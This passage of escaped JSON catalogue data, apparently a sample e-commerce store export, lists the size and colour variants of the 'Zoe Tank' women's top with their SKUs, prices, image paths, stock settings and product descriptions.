"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1640\":{\"sku\":\"WT02-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-XS-Yellow\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1641\":{\"sku\":\"WT02-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-S-Green\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1642\":{\"sku\":\"WT02-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-S-Orange\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1643\":{\"sku\":\"WT02-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-S-Yellow\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1644\":{\"sku\":\"WT02-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-M-Green\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1645\":{\"sku\":\"WT02-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-M-Orange\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1646\":{\"sku\":\"WT02-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-M-Yellow\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1647\":{\"sku\":\"WT02-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-L-Green\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1648\":{\"sku\":\"WT02-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-L-Orange\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_